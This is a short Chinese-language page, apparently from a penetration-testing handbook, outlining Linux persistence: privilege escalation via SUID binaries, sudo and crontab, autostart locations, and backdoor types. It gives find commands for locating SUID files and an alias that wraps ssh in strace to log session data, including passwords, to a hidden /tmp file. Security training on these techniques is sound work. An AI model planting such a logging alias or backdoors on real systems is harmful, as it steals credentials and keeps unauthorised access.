6.5. 持久化 - Linux
6.5.1. 权限提升
- 内核漏洞利用
- 攻击有root权限的服务
- 利用第三方服务提权
- 通过有SUID属性的可执行文件
- 查找可能提权的可执行文件
find / -perm +4000 -ls
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
- 利用可用的root权限
sudo -l
- 利用误配置的 crontab 任务
6.5.2. 自启动
- /etc/init.d
- /etc/rc.d/rc.local
6.5.3. 后门
- ssh 后门
alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'
- 后门账户
- 常见应用
- ICMP
- DNS
- icmp后门
- 后门端口复用
.
开头隐藏文件- rootkit
上一篇:6.4. 信息收集 - Linux下一篇:6.6. 痕迹清理